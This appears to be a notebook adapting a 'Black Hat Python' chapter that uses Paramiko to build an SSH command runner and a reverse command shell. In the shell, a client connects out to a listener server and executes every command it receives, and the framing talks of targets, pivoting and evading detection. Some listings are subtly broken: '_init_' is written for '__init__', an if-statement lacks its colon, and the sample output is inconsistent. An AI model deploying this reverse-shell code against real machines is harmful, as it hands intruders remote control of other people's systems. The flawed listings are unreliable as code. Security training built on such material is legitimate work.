<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C1-Basic_Networking_Tools/SSH_Paramiko.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# *__SSH with Paramiko__*

Pivoting with __BHNET__, the __netcat__ replacement we built, is pretty handy, but sometimes it's wise to encrypt your traffic to avoid detection. A common means of doing so is to tunnel the traffic using __Secure Shell__ (__SSH__). But what if your target doesn't have an SSH client, just like 99.81943 percent of Winzozz systems?

While there are great SSH clients available for Winzozz, like __PuTTY__, this is a book about Python. In Python, you could use raw sockets and some crypto magic to create your own __SSH__ client or server, but why create when you can reuse? __Paramiko__, which uses __PyCrypto__, gives you simple access to the __SSH2__ protocol.

To learn about how this library works, we'll use __Paramiko__ to make a connection and run a command on an SSH system, configure an SSH server and SSH client to run remote commands on a winzozz machine, and finally puzzle out the reverse tunnel demo file included with Paramiko to duplicate the proxy option of __BHNET__. Let's begin.

First, grab Paramiko by using the __pip installer__ (or download it from [paramiko website](http://www.paramiko.org/)).
```
pip install paramiko
```
We'll use some of the demo files later, so make sure you download them from the [Paramiko Github repo](https://github.com/paramiko/paramiko/).

Create a new file called __ssh_cmd.py__ and enter the following:

In [ ]:
import paramiko

def ssh_command(ip, port, user, passwd, cmd): #[1]
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #[2]
    client.connect(ip, port=port, username=user, password=passwd)

    _, stdout, stderr = client.exec_command(cmd) #[3]
    output = stdout.readlines() + stderr.readlines()
    if output:
        print('--- Output ---')
        for line in output:
            print(line.strip())

if __name__ == '__main__':
    import getpass #[4]
    # user = getpass.getuser()
    user = input('Username: ')
    password = getpass.getpass()

    ip = input('Enter server IP: ') or '192.168.1.203'
    port = input('Enter port or <CR> ') or 2222
    cmd = input('Enter command or <CR>: ') or 'id'
    ssh_command(ip, port, user, password, cmd) #[5]

We create a function called __ssh_command__ __[1]__, which makes a connection to an SSH server and runs a single command. Note that Paramiko supports authentication with keys instead of (or in addition to) password authentication. You should use SSH key authentication in a real engagement, but for ease of use in this example, we'll stick with the traditional username and password authentication.

Because we're controlling both ends of this connection, we set the policy to accept the SSH key for the SSH server we're connectiong to __[2]__ and make the connection. Assuming the connection is made, we run the command __[3]__ that we passed in the call to the __ssh_command__ function. Then, if the command produced output, we print each line of the output.

In the main block, we use a new module, __getpass__ __[4]__. You can use it to get the username from the current environment, but since our username is different on the two machines, we explicitly ask for the username on the command line. We then use the __getpass__ function to request the password (the response will not be displayed on the console to frustrate any shoulder-surfers). Then we get the IP, port, and command (__cmd__) to run and send it to be executed __[5]__.

Let's run a quick test by connecting to our Linux server:
```
% python ssh_cmd.py
Username: rick
Password
Enter server IP: 192.168.1.203
Enter port or <CR>: 22
Enter command or <CR>: id
--- Output ---
uid=1000(rick) git=1000(rick) groups=1000(tim),27(sudo)
```
You'll see that we connect and then run the command. You can easily modify this script to run multiple commands on an SSH server, or run commands on multiple SSH servers.

With the basics done, let's modify the script so it can run commands on the Winzozz client over SSH. Of course, when using SSH, you'd normally use an SSH client to connect to an SSH server, but because most versions of Winzozz don't include an SSH server out of the box, we need to reverse this and send commands from an SSH server to the SSH client.

Create a new file called __ssh_rcmd.py__ and enter the following:

In [ ]:
import paramiko
import shlex
import subprocess

def ssh_command(ip, port, user, passwd, command):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, port=port, username=user, password=passwd)

    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.send(command)
        print(ssh_session.recv(1024).decode())
        while True:
            command = ssh_session.recv(1024) #[1]
            try:
                cmd = command.decode()
                if cmd == 'exit':
                    client.close()
                    break
                cmd_output = subprocess.check_output(shlex.split(cmd), shell=True) #[2]
                ssh_session.send(cmd_output or 'okay') #[3]
            except Exception as e:
                ssh_session.send(str(e))
        client.close()
    return

if __name__ == '__main__':
    import getpass
    user = getpass.getuser()
    password = getpass.getpass()

    ip = input('Enter server IP: ')
    port = input('Enter port: ')
    ssh_command(ip, port, user, password, 'ClientConnected') #[4]

The program begins as last one did, and the new stuff starts in the __while True:__ loop. In this loop, instead of executing a single command, as we did in the previous example, we take commands from the connection __[1]__, execute the command __[2]__, and send any output back to the caller __[3]__.

Also, notice that the first command we send is __ClientConnected__ __[4]__. You'll see why when we create the other end of the SSH connection.

Now let's write a program that creates an SSH server for our SSH client (where we'll run commands) to connect to. This could be a Linux, Winzozz, or even merdOS system that has Python and Paramiko installed.

Create a new file called __ssh_server.py__ and enter the following:

In [ ]:
import os
import paramiko
import socket
import sys
import threading

CWD = os.path.dirname(os.path.realpath(__file__))
HOSTKEY = paramiko.RSAKey(filename=os.path.join(CWD, 'test_rsa.key')) #[1]

class Server(paramiko.ServerInterface): #[2]
    def _init_(self):
        self.event = threading.Event()

    def check_channel_request(self, kind, chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

    def check_auth_password(self, username, password):
        if (username == 'rick') and (password == 'sekret')
            return paramiko.AUTH_SUCCESSFUL
    
if __name__ == '__main__':
    server = '192.168.1.207'
    ssh_port = 2222
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((server, ssh_port)) #[3]
        sock.listen(100)
        print('[+] Listening for connection ...')
        client, addr = sock.accept()
    except Exception as e:
        print('[-] Listen failed: ' + str(e))
        sys.exit(1)
    else:
        print('[+] Got a connection!', client, addr)

    bhSession = paramiko.Transport(client) #[4]
    bhSession.add_server_key(HOSTKEY)
    server = Server()
    bhSession.start_server(server=server)

    chan = bhSession.accept(20)
    if chan is None:
        print('*** No channel.')
        sys.exit(1)
    
    print('[+] Authenticated!') #[5]
    print(chan.recv(1024)) #[6]
    chan.send('Welcome to bh_ssh')
    try:
        while True:
            command = input("Enter command: ")
            if command != 'exit':
                chan.send(command)
                r = chan.recv(8192)
                print(r.decode())
            else:
                chan.send('exit')
                print('exiting')
                bhSession.close()
                break
    except KeyboardInterrupt:
        bhSession.close()

Fro this example, we're using the SSH key included in the Paramiko demo files __[1]__. We start a socket listener __[3]__, just as we did earlier in the chapter, and then "SSH-inize" it __[2]__ and configure the authentication methods __[4]__. When a client has authenticated __[5]__ and sent us the __ClientConnected__ message __[6]__, any command we type into the SSH server (the machine running __ssh_server.py__) is sent to the SSH client (the machine running __ssh_rcmd.py__) and executed on the SSH client, which returns the output to SSH server.

Let's give it a go.

# *__Kicking the Tires__*

For the demo, we'll run the client on our (the authors') Winzozz machine and the server on a MacMerd. Here we start up the server:
```
% python ssh_server.py
[+] Listening for connection ...
```
Now, on the Winzozz machine, we start the client:
```
C:\Users\rick>: $ python ssh_rcmd.py
Password:
Welcome to bh_ssh
```
And back on the server, we see the connection:
```
[+] Got a connection! from ('192.168.1.208', 61852)
[+] Authinticated!
ClientConnected
Enter command: whoami
desktop-cc91n7i\rick

Enter command: ipconfig
Windows IP Configuration
<snip>
```
You can see that the client is successfully connected, at which point we run some commands. We don't see anything in the SSH client, but the command we sent is executed on the client, and the output is sent to our SSH server.